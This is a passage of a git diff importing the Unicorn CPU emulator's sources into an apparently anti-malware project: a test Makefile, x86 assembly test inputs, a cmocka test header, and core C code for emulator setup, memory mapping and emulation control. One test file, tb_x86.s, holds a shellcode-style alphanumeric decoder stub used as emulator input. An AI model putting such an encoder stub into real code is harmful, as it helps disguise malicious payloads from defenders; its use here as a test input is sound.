-D__USE_MINGW_ANSI_STDIO=1 +CFLAGS += -L ../../ -I ../../include +CFLAGS += -L ../../cmocka/src -I ../../cmocka/include +CFLAGS += -L /usr/local/lib -I /usr/local/include +ASFLAGS += --32 +OBJCOPY = objcopy + +UNAME_S := $(shell uname -s) +UNAME_M := $(shell uname -m) +LDLIBS += -pthread +ifeq ($(UNAME_S), Linux) +LDLIBS += -lrt +else ifeq ($(UNAME_S), Darwin) +OBJCOPY = gobjcopy +ASFLAGS = -arch i386 +endif + +LDLIBS += -lcmocka -lunicorn + +EXECUTE_VARS = LD_LIBRARY_PATH=../../cmocka/src:../../ DYLD_LIBRARY_PATH=../../ + +ifeq ($(UNICORN_ASAN),yes) +CC = clang -fsanitize=address -fno-omit-frame-pointer +CXX = clang++ -fsanitize=address -fno-omit-frame-pointer +AR = 
llvm-ar +LDFLAGS := -fsanitize=address ${LDFLAGS} +endif + +ALL_TESTS_SOURCES = $(wildcard *.c) +TEST_ASSEMBLY = $(wildcard *.s) +TEST_PROGS = $(TEST_ASSEMBLY:%.s=%.o) +TEST_BINS = $(TEST_PROGS:%.o=%.bin) +ALL_TESTS = $(ALL_TESTS_SOURCES:%.c=%) + +ifneq (,$(findstring x86,$(UNAME_M))) +ALL_TESTS += $(TEST_BINS) +endif + +.PHONY: all +all: ${ALL_TESTS} + +.PHONY: clean +clean: + rm -rf ${ALL_TESTS} + +%.bin: %.o + ${OBJCOPY} -O binary $^ $@ + hexdump -C $@ + +.PHONY: test +test: all + ${EXECUTE_VARS} ./test_sanity + ${EXECUTE_VARS} ./test_x86 + ${EXECUTE_VARS} ./test_mem_map + ${EXECUTE_VARS} ./test_mem_map_ptr + ${EXECUTE_VARS} ./test_mem_high + ${EXECUTE_VARS} ./test_multihook + ${EXECUTE_VARS} ./test_pc_change + ${EXECUTE_VARS} ./test_hookcounts + echo "skipping test_tb_x86" + echo "skipping test_x86_soft_paging" + echo "skipping test_hang" + echo "skipping test_x86_sh1_enter_leave" + echo "skipping test_x86_rip_bug" diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/unit/gdt_idx.s b/ai_anti_malware/unicorn/unicorn-master/tests/unit/gdt_idx.s new file mode 100644 index 0000000..42e2462 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/unit/gdt_idx.s @@ -0,0 +1,3 @@ +.text +sidt (esp) +sgdt (esp+6) diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/unit/high_address.s b/ai_anti_malware/unicorn/unicorn-master/tests/unit/high_address.s new file mode 100644 index 0000000..de92144 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/unit/high_address.s @@ -0,0 +1,6 @@ +dec %eax +mov (%eax), %eax +nop +nop +nop +nop diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/unit/pc_change.s b/ai_anti_malware/unicorn/unicorn-master/tests/unit/pc_change.s new file mode 100644 index 0000000..415e3cf --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/unit/pc_change.s @@ -0,0 +1,9 @@ +.text +inc %ecx +inc %ecx +inc %ecx +inc %ecx +inc %ecx +inc %ecx +inc %edx +inc %edx diff --git 
a/ai_anti_malware/unicorn/unicorn-master/tests/unit/tb_x86.s b/ai_anti_malware/unicorn/unicorn-master/tests/unit/tb_x86.s new file mode 100644 index 0000000..8ef54c0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/unit/tb_x86.s @@ -0,0 +1,90 @@ +mov %esp,%ecx +fxch %st(5) +fnstenv -0xc(%ecx) +pop %ebp +push %ebp +pop %ecx +dec %ecx +dec %ecx +dec %ecx +dec %ecx +dec %ecx +dec %ecx +dec %ecx +dec %ecx +dec %ecx +dec %ecx +inc %ebx +inc %ebx +inc %ebx +inc %ebx +inc %ebx +inc %ebx +aaa +push %ecx +pop %edx +push $0x41 +pop %eax +push %eax +xor %al,0x30(%ecx) +inc %ecx +imul $0x51,0x41(%ecx),%eax +xor 0x42(%ecx),%al +xor 0x42(%edx),%al +xor %al,0x42(%edx) +inc %ecx +inc %edx +pop %eax +push %eax +cmp %al,0x42(%ecx) +jne .+0x4c +dec %ecx +push %ecx +push %ecx +push %ecx +push %edx +inc %edi +xor 0x34(%edi),%eax +push %ecx +push %ebp +push %ecx +push %esi +push %eax +inc %edi +inc %edi +cmp %al,0x39(%edi) +push %eax +dec %edx +push %eax +dec %ebx +push %eax +dec %esp +push %eax +dec %ebp +push %eax +dec %esi +push %eax +dec %edi +push %eax +push %eax +push %eax +xor %eax, 0x42(%edi) +inc %edi +inc %edx +push %eax +xor $0x50,%al +pop %edx +push %eax +inc %ebp +push %ecx +push %edx +inc %esi +xor 0x31(%edi),%al +push %eax +dec %ebp +push %ecx +push %ecx +push %eax +dec %esi +inc %ecx +inc %ecx diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/unit/unicorn_test.h b/ai_anti_malware/unicorn/unicorn-master/tests/unit/unicorn_test.h new file mode 100644 index 0000000..fa695d9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/unit/unicorn_test.h @@ -0,0 +1,57 @@ +#ifndef UNICORN_TEST_H +#define UNICORN_TEST_H + +#include +#include +#include +#include +#include +#include + +/** + * Assert that err matches expect + */ +#define uc_assert_err(expect, err) \ +do { \ + uc_err __err = err; \ + if (__err != expect) { \ + fail_msg("%s", uc_strerror(__err)); \ + } \ +} while (0) + +/** + * Assert that err is UC_ERR_OK + */ +#define 
uc_assert_success(err) uc_assert_err(UC_ERR_OK, err) + +/** + * Assert that err is anything but UC_ERR_OK + * + * Note: Better to use uc_assert_err(, err), + * as this serves to document which errors a function will return + * in various scenarios. + */ +#define uc_assert_fail(err) \ +do { \ + uc_err __err = err; \ + if (__err == UC_ERR_OK) { \ + fail_msg("%s", uc_strerror(__err)); \ + } \ +} while (0) + +char * read_file(const char *filename, struct stat *info) { + stat(filename, info); + char *code = malloc(info->st_size); + if (code == NULL) { + return NULL; + } + FILE *fp = fopen(filename, "r"); + if (fp == NULL) { + free(code); + return NULL; + } + fread(code, info->st_size, 1, fp); + return code; +} + +#endif /* UNICORN_TEST_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/unit/x86_soft_paging_low.s b/ai_anti_malware/unicorn/unicorn-master/tests/unit/x86_soft_paging_low.s new file mode 100644 index 0000000..7b25745 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/unit/x86_soft_paging_low.s @@ -0,0 +1,49 @@ +// Zero memory for page directories and page tables +mov $0x1000,%edi +mov $0x1000,%ecx +xor %eax,%eax +rep stos %eax,(%edi) + +// Load DWORD [0x4000] with 0xDEADBEEF to retrieve later +mov $0x4000,%edi +mov $0xBEEF,%eax +mov %eax, (%edi) + +// Identify map the first 4MiB of memory +mov $0x400,%ecx +mov $0x2000,%edi +mov $3, %eax +loop: +stos %eax,(%edi) +add $0x1000,%eax +loop loop + +// Map phyiscal address 0x4000 to cirtual address 0x7FF000 +mov $0x3ffc,%edi +mov $0x4003,%eax +mov %eax, (%edi) + +// Add page tables into page directory +mov $0x1000, %edi +mov $0x2003, %eax +mov %eax, (%edi) +mov $0x1004, %edi +mov $0x3003, %eax +mov %eax, (%edi) + +// Load the page directory register +mov $0x1000, %eax +mov %eax, %cr3 + +// Enable paging +mov %cr0, %eax +or $0x80000000, %eax + +// Clear EAX +mov %eax, %cr0 + +//Load using virtual memory address; EAX = 0xBEEF +xor %eax,%eax +mov $0x7FF000, %esi +mov (%esi), %eax +hlt diff 
--git a/ai_anti_malware/unicorn/unicorn-master/uc.c b/ai_anti_malware/unicorn/unicorn-master/uc.c new file mode 100644 index 0000000..eebce1f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/uc.c @@ -0,0 +1,1404 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015 */ + +#if defined(UNICORN_HAS_OSXKERNEL) +#include +#else +#include +#include +#include +#endif + +#include // nanosleep + +#include + +#include "uc_priv.h" + +// target specific headers +#include "qemu/target-m68k/unicorn.h" +#include "qemu/target-i386/unicorn.h" +#include "qemu/target-arm/unicorn.h" +#include "qemu/target-mips/unicorn.h" +#include "qemu/target-sparc/unicorn.h" + +#include "qemu/include/hw/boards.h" +#include "qemu/include/qemu/queue.h" + +static void free_table(gpointer key, gpointer value, gpointer data) +{ + TypeInfo *ti = (TypeInfo*) value; + g_free((void *) ti->class_); + g_free((void *) ti->name); + g_free((void *) ti->parent); + g_free((void *) ti); +} + +UNICORN_EXPORT +unsigned int uc_version(unsigned int *major, unsigned int *minor) +{ + if (major != NULL && minor != NULL) { + *major = UC_API_MAJOR; + *minor = UC_API_MINOR; + } + + return (UC_API_MAJOR << 8) + UC_API_MINOR; +} + + +UNICORN_EXPORT +uc_err uc_errno(uc_engine *uc) +{ + return uc->errnum; +} + + +UNICORN_EXPORT +const char *uc_strerror(uc_err code) +{ + switch(code) { + default: + return "Unknown error code"; + case UC_ERR_OK: + return "OK (UC_ERR_OK)"; + case UC_ERR_NOMEM: + return "No memory available or memory not present (UC_ERR_NOMEM)"; + case UC_ERR_ARCH: + return "Invalid/unsupported architecture (UC_ERR_ARCH)"; + case UC_ERR_HANDLE: + return "Invalid handle (UC_ERR_HANDLE)"; + case UC_ERR_MODE: + return "Invalid mode (UC_ERR_MODE)"; + case UC_ERR_VERSION: + return "Different API version between core & binding (UC_ERR_VERSION)"; + case UC_ERR_READ_UNMAPPED: + return "Invalid memory read (UC_ERR_READ_UNMAPPED)"; + case UC_ERR_WRITE_UNMAPPED: + return "Invalid memory write 
(UC_ERR_WRITE_UNMAPPED)"; + case UC_ERR_FETCH_UNMAPPED: + return "Invalid memory fetch (UC_ERR_FETCH_UNMAPPED)"; + case UC_ERR_HOOK: + return "Invalid hook type (UC_ERR_HOOK)"; + case UC_ERR_INSN_INVALID: + return "Invalid instruction (UC_ERR_INSN_INVALID)"; + case UC_ERR_MAP: + return "Invalid memory mapping (UC_ERR_MAP)"; + case UC_ERR_WRITE_PROT: + return "Write to write-protected memory (UC_ERR_WRITE_PROT)"; + case UC_ERR_READ_PROT: + return "Read from non-readable memory (UC_ERR_READ_PROT)"; + case UC_ERR_FETCH_PROT: + return "Fetch from non-executable memory (UC_ERR_FETCH_PROT)"; + case UC_ERR_ARG: + return "Invalid argument (UC_ERR_ARG)"; + case UC_ERR_READ_UNALIGNED: + return "Read from unaligned memory (UC_ERR_READ_UNALIGNED)"; + case UC_ERR_WRITE_UNALIGNED: + return "Write to unaligned memory (UC_ERR_WRITE_UNALIGNED)"; + case UC_ERR_FETCH_UNALIGNED: + return "Fetch from unaligned memory (UC_ERR_FETCH_UNALIGNED)"; + case UC_ERR_RESOURCE: + return "Insufficient resource (UC_ERR_RESOURCE)"; + case UC_ERR_EXCEPTION: + return "Unhandled CPU exception (UC_ERR_EXCEPTION)"; + } +} + + +UNICORN_EXPORT +bool uc_arch_supported(uc_arch arch) +{ + switch (arch) { +#ifdef UNICORN_HAS_ARM + case UC_ARCH_ARM: return true; +#endif +#ifdef UNICORN_HAS_ARM64 + case UC_ARCH_ARM64: return true; +#endif +#ifdef UNICORN_HAS_M68K + case UC_ARCH_M68K: return true; +#endif +#ifdef UNICORN_HAS_MIPS + case UC_ARCH_MIPS: return true; +#endif +#ifdef UNICORN_HAS_PPC + case UC_ARCH_PPC: return true; +#endif +#ifdef UNICORN_HAS_SPARC + case UC_ARCH_SPARC: return true; +#endif +#ifdef UNICORN_HAS_X86 + case UC_ARCH_X86: return true; +#endif + /* Invalid or disabled arch */ + default: return false; + } +} + + +UNICORN_EXPORT +uc_err uc_open(uc_arch arch, uc_mode mode, uc_engine **result) +{ + struct uc_struct *uc; + + if (arch < UC_ARCH_MAX) { + uc = calloc(1, sizeof(*uc)); + if (!uc) { + // memory insufficient + return UC_ERR_NOMEM; + } + + uc->errnum = UC_ERR_OK; + uc->arch = arch; + 
uc->mode = mode; + + // uc->ram_list = { .blocks = QTAILQ_HEAD_INITIALIZER(ram_list.blocks) }; + uc->ram_list.blocks.tqh_first = NULL; + uc->ram_list.blocks.tqh_last = &(uc->ram_list.blocks.tqh_first); + + uc->memory_listeners.tqh_first = NULL; + uc->memory_listeners.tqh_last = &uc->memory_listeners.tqh_first; + + uc->address_spaces.tqh_first = NULL; + uc->address_spaces.tqh_last = &uc->address_spaces.tqh_first; + + switch(arch) { + default: + break; +#ifdef UNICORN_HAS_M68K + case UC_ARCH_M68K: + if ((mode & ~UC_MODE_M68K_MASK) || + !(mode & UC_MODE_BIG_ENDIAN)) { + free(uc); + return UC_ERR_MODE; + } + uc->init_arch = m68k_uc_init; + break; +#endif +#ifdef UNICORN_HAS_X86 + case UC_ARCH_X86: + if ((mode & ~UC_MODE_X86_MASK) || + (mode & UC_MODE_BIG_ENDIAN) || + !(mode & (UC_MODE_16|UC_MODE_32|UC_MODE_64))) { + free(uc); + return UC_ERR_MODE; + } + uc->init_arch = x86_uc_init; + break; +#endif +#ifdef UNICORN_HAS_ARM + case UC_ARCH_ARM: + if ((mode & ~UC_MODE_ARM_MASK)) { + free(uc); + return UC_ERR_MODE; + } + if (mode & UC_MODE_BIG_ENDIAN) { +#ifdef UNICORN_HAS_ARMEB + uc->init_arch = armeb_uc_init; +#else + return UC_ERR_MODE; +#endif + } else { + uc->init_arch = arm_uc_init; + } + + if (mode & UC_MODE_THUMB) + uc->thumb = 1; + break; +#endif +#ifdef UNICORN_HAS_ARM64 + case UC_ARCH_ARM64: + if (mode & ~UC_MODE_ARM_MASK) { + free(uc); + return UC_ERR_MODE; + } + if (mode & UC_MODE_BIG_ENDIAN) { + uc->init_arch = arm64eb_uc_init; + } else { + uc->init_arch = arm64_uc_init; + } + break; +#endif + +#if defined(UNICORN_HAS_MIPS) || defined(UNICORN_HAS_MIPSEL) || defined(UNICORN_HAS_MIPS64) || defined(UNICORN_HAS_MIPS64EL) + case UC_ARCH_MIPS: + if ((mode & ~UC_MODE_MIPS_MASK) || + !(mode & (UC_MODE_MIPS32|UC_MODE_MIPS64))) { + free(uc); + return UC_ERR_MODE; + } + if (mode & UC_MODE_BIG_ENDIAN) { +#ifdef UNICORN_HAS_MIPS + if (mode & UC_MODE_MIPS32) + uc->init_arch = mips_uc_init; +#endif +#ifdef UNICORN_HAS_MIPS64 + if (mode & UC_MODE_MIPS64) + uc->init_arch = 
mips64_uc_init; +#endif + } else { // little endian +#ifdef UNICORN_HAS_MIPSEL + if (mode & UC_MODE_MIPS32) + uc->init_arch = mipsel_uc_init; +#endif +#ifdef UNICORN_HAS_MIPS64EL + if (mode & UC_MODE_MIPS64) + uc->init_arch = mips64el_uc_init; +#endif + } + break; +#endif + +#ifdef UNICORN_HAS_SPARC + case UC_ARCH_SPARC: + if ((mode & ~UC_MODE_SPARC_MASK) || + !(mode & UC_MODE_BIG_ENDIAN) || + !(mode & (UC_MODE_SPARC32|UC_MODE_SPARC64))) { + free(uc); + return UC_ERR_MODE; + } + if (mode & UC_MODE_SPARC64) + uc->init_arch = sparc64_uc_init; + else + uc->init_arch = sparc_uc_init; + break; +#endif + } + + if (uc->init_arch == NULL) { + return UC_ERR_ARCH; + } + + if (machine_initialize(uc)) + return UC_ERR_RESOURCE; + + *result = uc; + + if (uc->reg_reset) + uc->reg_reset(uc); + + return UC_ERR_OK; + } else { + return UC_ERR_ARCH; + } +} + + +UNICORN_EXPORT +uc_err uc_close(uc_engine *uc) +{ + int i; + struct list_item *cur; + struct hook *hook; + + // Cleanup internally. + if (uc->release) + uc->release(uc->tcg_ctx); + g_free(uc->tcg_ctx); + + // Cleanup CPU. + g_free(uc->cpu->tcg_as_listener); + g_free(uc->cpu->thread); + + // Cleanup all objects. + OBJECT(uc->machine_state->accelerator)->ref = 1; + OBJECT(uc->machine_state)->ref = 1; + OBJECT(uc->owner)->ref = 1; + OBJECT(uc->root)->ref = 1; + + object_unref(uc, OBJECT(uc->machine_state->accelerator)); + object_unref(uc, OBJECT(uc->machine_state)); + object_unref(uc, OBJECT(uc->cpu)); + object_unref(uc, OBJECT(&uc->io_mem_notdirty)); + object_unref(uc, OBJECT(&uc->io_mem_unassigned)); + object_unref(uc, OBJECT(&uc->io_mem_rom)); + object_unref(uc, OBJECT(uc->root)); + + // System memory. + g_free(uc->system_memory); + + // Thread relateds. + if (uc->qemu_thread_data) + g_free(uc->qemu_thread_data); + + // Other auxilaries. 
+ free(uc->l1_map); + + if (uc->bounce.buffer) { + free(uc->bounce.buffer); + } + + g_hash_table_foreach(uc->type_table, free_table, uc); + g_hash_table_destroy(uc->type_table); + + for (i = 0; i < DIRTY_MEMORY_NUM; i++) { + free(uc->ram_list.dirty_memory[i]); + } + + // free hooks and hook lists + for (i = 0; i < UC_HOOK_MAX; i++) { + cur = uc->hook[i].head; + // hook can be in more than one list + // so we refcount to know when to free + while (cur) { + hook = (struct hook *)cur->data; + if (--hook->refs == 0) { + free(hook); + } + cur = cur->next; + } + list_clear(&uc->hook[i]); + } + + free(uc->mapped_blocks); + + // free the saved contexts list and notify them that uc has been closed. + cur = uc->saved_contexts.head; + while (cur != NULL) { + struct list_item *next = cur->next; + struct uc_context *context = (struct uc_context*)cur->data; + context->uc = NULL; + cur = next; + } + list_clear(&uc->saved_contexts); + + // finally, free uc itself. + memset(uc, 0, sizeof(*uc)); + free(uc); + + return UC_ERR_OK; +} + + +UNICORN_EXPORT +uc_err uc_reg_read_batch(uc_engine *uc, int *ids, void **vals, int count) +{ + if (uc->reg_read) + uc->reg_read(uc, (unsigned int *)ids, vals, count); + else + return -1; // FIXME: need a proper uc_err + + return UC_ERR_OK; +} + + +UNICORN_EXPORT +uc_err uc_reg_write_batch(uc_engine *uc, int *ids, void *const *vals, int count) +{ + int ret = UC_ERR_OK; + if (uc->reg_write) + ret = uc->reg_write(uc, (unsigned int *)ids, vals, count); + else + return UC_ERR_EXCEPTION; // FIXME: need a proper uc_err + + return ret; +} + + +UNICORN_EXPORT +uc_err uc_reg_read(uc_engine *uc, int regid, void *value) +{ + return uc_reg_read_batch(uc, ®id, &value, 1); +} + +UNICORN_EXPORT +uc_err uc_reg_write(uc_engine *uc, int regid, const void *value) +{ + return uc_reg_write_batch(uc, ®id, (void *const *)&value, 1); +} + +// check if a memory area is mapped +// this is complicated because an area can overlap adjacent blocks +static bool 
check_mem_area(uc_engine *uc, uint64_t address, size_t size) +{ + size_t count = 0, len; + + while(count < size) { + MemoryRegion *mr = memory_mapping(uc, address); + if (mr) { + len = (size_t)MIN(size - count, mr->end - address); + count += len; + address += len; + } else // this address is not mapped in yet + break; + } + + return (count == size); +} + + +UNICORN_EXPORT +uc_err uc_mem_read(uc_engine *uc, uint64_t address, void *_bytes, size_t size) +{ + size_t count = 0, len; + uint8_t *bytes = _bytes; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + if (!check_mem_area(uc, address, size)) + return UC_ERR_READ_UNMAPPED; + + // memory area can overlap adjacent memory blocks + while(count < size) { + MemoryRegion *mr = memory_mapping(uc, address); + if (mr) { + len = (size_t)MIN(size - count, mr->end - address); + if (uc->read_mem(&uc->as, address, bytes, len) == false) + break; + count += len; + address += len; + bytes += len; + } else // this address is not mapped in yet + break; + } + + if (count == size) + return UC_ERR_OK; + else + return UC_ERR_READ_UNMAPPED; +} + +UNICORN_EXPORT +uc_err uc_mem_write(uc_engine *uc, uint64_t address, const void *_bytes, size_t size) +{ + size_t count = 0, len; + const uint8_t *bytes = _bytes; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + if (!check_mem_area(uc, address, size)) + return UC_ERR_WRITE_UNMAPPED; + + // memory area can overlap adjacent memory blocks + while(count < size) { + MemoryRegion *mr = memory_mapping(uc, address); + if (mr) { + uint32_t operms = mr->perms; + if (!(operms & UC_PROT_WRITE)) // write protected + // but this is not the program accessing memory, so temporarily mark writable + uc->readonly_mem(mr, false); + + len = (size_t)MIN(size - count, mr->end - address); + if (uc->write_mem(&uc->as, address, bytes, len) == false) + break; + + if (!(operms & UC_PROT_WRITE)) // write protected + // now write protect it again + uc->readonly_mem(mr, true); 
+ + count += len; + address += len; + bytes += len; + } else // this address is not mapped in yet + break; + } + + if (count == size) + return UC_ERR_OK; + else + return UC_ERR_WRITE_UNMAPPED; +} + +#define TIMEOUT_STEP 2 // microseconds +static void *_timeout_fn(void *arg) +{ + struct uc_struct *uc = arg; + int64_t current_time = get_clock(); + + do { + usleep(TIMEOUT_STEP); + // perhaps emulation is even done before timeout? + if (uc->emulation_done) + break; + } while((uint64_t)(get_clock() - current_time) < uc->timeout); + + // timeout before emulation is done? + if (!uc->emulation_done) { + uc->timed_out = true; + // force emulation to stop + uc_emu_stop(uc); + } + + return NULL; +} + +static void enable_emu_timer(uc_engine *uc, uint64_t timeout) +{ + uc->timeout = timeout; + qemu_thread_create(uc, &uc->timer, "timeout", _timeout_fn, + uc, QEMU_THREAD_JOINABLE); +} + +static void hook_count_cb(struct uc_struct *uc, uint64_t address, uint32_t size, void *user_data) +{ + // count this instruction. ah ah ah. 
+ uc->emu_counter++; + + if (uc->emu_counter > uc->emu_count) + uc_emu_stop(uc); +} + +static void clear_deleted_hooks(uc_engine *uc) +{ + struct list_item * cur; + struct hook * hook; + int i; + + for (cur = uc->hooks_to_del.head; cur != NULL && (hook = (struct hook *)cur->data); cur = cur->next) { + assert(hook->to_delete); + for (i = 0; i < UC_HOOK_MAX; i++) { + if (list_remove(&uc->hook[i], (void *)hook)) { + if (--hook->refs == 0) { + free(hook); + } + + // a hook cannot be twice in the same list + break; + } + } + } + + list_clear(&uc->hooks_to_del); +} + +UNICORN_EXPORT +uc_err uc_emu_start(uc_engine* uc, uint64_t begin, uint64_t until, uint64_t timeout, size_t count) +{ + // reset the counter + uc->emu_counter = 0; + uc->invalid_error = UC_ERR_OK; + uc->block_full = false; + uc->emulation_done = false; + uc->size_recur_mem = 0; + uc->timed_out = false; + + switch(uc->arch) { + default: + break; +#ifdef UNICORN_HAS_M68K + case UC_ARCH_M68K: + uc_reg_write(uc, UC_M68K_REG_PC, &begin); + break; +#endif +#ifdef UNICORN_HAS_X86 + case UC_ARCH_X86: + switch(uc->mode) { + default: + break; + case UC_MODE_16: { + uint64_t ip; + uint16_t cs; + + uc_reg_read(uc, UC_X86_REG_CS, &cs); + // compensate for later adding up IP & CS + ip = begin - cs*16; + uc_reg_write(uc, UC_X86_REG_IP, &ip); + break; + } + case UC_MODE_32: + uc_reg_write(uc, UC_X86_REG_EIP, &begin); + break; + case UC_MODE_64: + uc_reg_write(uc, UC_X86_REG_RIP, &begin); + break; + } + break; +#endif +#ifdef UNICORN_HAS_ARM + case UC_ARCH_ARM: + uc_reg_write(uc, UC_ARM_REG_R15, &begin); + break; +#endif +#ifdef UNICORN_HAS_ARM64 + case UC_ARCH_ARM64: + uc_reg_write(uc, UC_ARM64_REG_PC, &begin); + break; +#endif +#ifdef UNICORN_HAS_MIPS + case UC_ARCH_MIPS: + // TODO: MIPS32/MIPS64/BIGENDIAN etc + uc_reg_write(uc, UC_MIPS_REG_PC, &begin); + break; +#endif +#ifdef UNICORN_HAS_SPARC + case UC_ARCH_SPARC: + // TODO: Sparc/Sparc64 + uc_reg_write(uc, UC_SPARC_REG_PC, &begin); + break; +#endif + } + + 
uc->stop_request = false; + + uc->emu_count = count; + // remove count hook if counting isn't necessary + if (count <= 0 && uc->count_hook != 0) { + uc_hook_del(uc, uc->count_hook); + uc->count_hook = 0; + } + // set up count hook to count instructions. + if (count > 0 && uc->count_hook == 0) { + uc_err err; + // callback to count instructions must be run before everything else, + // so instead of appending, we must insert the hook at the begin + // of the hook list + uc->hook_insert = 1; + err = uc_hook_add(uc, &uc->count_hook, UC_HOOK_CODE, hook_count_cb, NULL, 1, 0); + // restore to append mode for uc_hook_add() + uc->hook_insert = 0; + if (err != UC_ERR_OK) { + return err; + } + } + + uc->addr_end = until; + + if (timeout) + enable_emu_timer(uc, timeout * 1000); // microseconds -> nanoseconds + + if (uc->vm_start(uc)) { + return UC_ERR_RESOURCE; + } + + // emulation is done + uc->emulation_done = true; + + // remove hooks to delete + clear_deleted_hooks(uc); + + if (timeout) { + // wait for the timer to finish + qemu_thread_join(&uc->timer); + } + + return uc->invalid_error; +} + + +UNICORN_EXPORT +uc_err uc_emu_stop(uc_engine *uc) +{ + if (uc->emulation_done) + return UC_ERR_OK; + + uc->stop_request = true; + // TODO: make this atomic somehow? + if (uc->current_cpu) { + // exit the current TB + cpu_exit(uc->current_cpu); + } + + return UC_ERR_OK; +} + +// find if a memory range overlaps with existing mapped regions +static bool memory_overlap(struct uc_struct *uc, uint64_t begin, size_t size) +{ + unsigned int i; + uint64_t end = begin + size - 1; + + for(i = 0; i < uc->mapped_block_count; i++) { + // begin address falls inside this region? + if (begin >= uc->mapped_blocks[i]->addr && begin <= uc->mapped_blocks[i]->end - 1) + return true; + + // end address falls inside this region? + if (end >= uc->mapped_blocks[i]->addr && end <= uc->mapped_blocks[i]->end - 1) + return true; + + // this region falls totally inside this range? 
+ if (begin < uc->mapped_blocks[i]->addr && end > uc->mapped_blocks[i]->end - 1) + return true; + } + + // not found + return false; +} + +// common setup/error checking shared between uc_mem_map and uc_mem_map_ptr +static uc_err mem_map(uc_engine *uc, uint64_t address, size_t size, uint32_t perms, MemoryRegion *block) +{ + MemoryRegion **regions; + + if (block == NULL) + return UC_ERR_NOMEM; + + if ((uc->mapped_block_count & (MEM_BLOCK_INCR - 1)) == 0) { //time to grow + regions = (MemoryRegion**)g_realloc(uc->mapped_blocks, + sizeof(MemoryRegion*) * (uc->mapped_block_count + MEM_BLOCK_INCR)); + if (regions == NULL) { + return UC_ERR_NOMEM; + } + uc->mapped_blocks = regions; + } + + uc->mapped_blocks[uc->mapped_block_count] = block; + uc->mapped_block_count++; + + return UC_ERR_OK; +} + +static uc_err mem_map_check(uc_engine *uc, uint64_t address, size_t size, uint32_t perms) +{ + if (size == 0) + // invalid memory mapping + return UC_ERR_ARG; + + // address cannot wrapp around + if (address + size - 1 < address) + return UC_ERR_ARG; + + // address must be aligned to uc->target_page_size + if ((address & uc->target_page_align) != 0) + return UC_ERR_ARG; + + // size must be multiple of uc->target_page_size + if ((size & uc->target_page_align) != 0) + return UC_ERR_ARG; + + // check for only valid permissions + if ((perms & ~UC_PROT_ALL) != 0) + return UC_ERR_ARG; + + // this area overlaps existing mapped regions? 
+ if (memory_overlap(uc, address, size)) { + return UC_ERR_MAP; + } + + return UC_ERR_OK; +} + +UNICORN_EXPORT +uc_err uc_mem_map(uc_engine *uc, uint64_t address, size_t size, uint32_t perms) +{ + uc_err res; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + res = mem_map_check(uc, address, size, perms); + if (res) + return res; + + return mem_map(uc, address, size, perms, uc->memory_map(uc, address, size, perms)); +} + +UNICORN_EXPORT +uc_err uc_mem_map_ptr(uc_engine *uc, uint64_t address, size_t size, uint32_t perms, void *ptr) +{ + uc_err res; + + if (ptr == NULL) + return UC_ERR_ARG; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + res = mem_map_check(uc, address, size, perms); + if (res) + return res; + + return mem_map(uc, address, size, UC_PROT_ALL, uc->memory_map_ptr(uc, address, size, perms, ptr)); +} + +// Create a backup copy of the indicated MemoryRegion. +// Generally used in prepartion for splitting a MemoryRegion. +static uint8_t *copy_region(struct uc_struct *uc, MemoryRegion *mr) +{ + uint8_t *block = (uint8_t *)g_malloc0((size_t)int128_get64(mr->size)); + if (block != NULL) { + uc_err err = uc_mem_read(uc, mr->addr, block, (size_t)int128_get64(mr->size)); + if (err != UC_ERR_OK) { + free(block); + block = NULL; + } + } + + return block; +} + +/* + Split the given MemoryRegion at the indicated address for the indicated size + this may result in the create of up to 3 spanning sections. If the delete + parameter is true, the no new section will be created to replace the indicate + range. This functions exists to support uc_mem_protect and uc_mem_unmap. + + This is a static function and callers have already done some preliminary + parameter validation. + + The do_delete argument indicates that we are being called to support + uc_mem_unmap. 
In this case we save some time by choosing NOT to remap + the areas that are intended to get unmapped + */ +// TODO: investigate whether qemu region manipulation functions already offered +// this capability +static bool split_region(struct uc_struct *uc, MemoryRegion *mr, uint64_t address, + size_t size, bool do_delete) +{ + uint8_t *backup; + uint32_t perms; + uint64_t begin, end, chunk_end; + size_t l_size, m_size, r_size; + RAMBlock *block = NULL; + bool prealloc = false; + + chunk_end = address + size; + + // if this region belongs to area [address, address+size], + // then there is no work to do. + if (address <= mr->addr && chunk_end >= mr->end) + return true; + + if (size == 0) + // trivial case + return true; + + if (address >= mr->end || chunk_end <= mr->addr) + // impossible case + return false; + + QTAILQ_FOREACH(block, &uc->ram_list.blocks, next) { + if (block->offset <= mr->addr && block->length >= (mr->end - mr->addr)) { + break; + } + } + + if (block == NULL) + return false; + + // RAM_PREALLOC is not defined outside exec.c and I didn't feel like + // moving it + prealloc = !!(block->flags & 1); + + if (block->flags & 1) { + backup = block->host; + } else { + backup = copy_region(uc, mr); + if (backup == NULL) + return false; + } + + // save the essential information required for the split before mr gets deleted + perms = mr->perms; + begin = mr->addr; + end = mr->end; + + // unmap this region first, then do split it later + if (uc_mem_unmap(uc, mr->addr, (size_t)int128_get64(mr->size)) != UC_ERR_OK) + goto error; + + /* overlapping cases + * |------mr------| + * case 1 |---size--| + * case 2 |--size--| + * case 3 |---size--| + */ + + // adjust some things + if (address < begin) + address = begin; + if (chunk_end > end) + chunk_end = end; + + // compute sub region sizes + l_size = (size_t)(address - begin); + r_size = (size_t)(end - chunk_end); + m_size = (size_t)(chunk_end - address); + + // If there are error in any of the below operations, things 
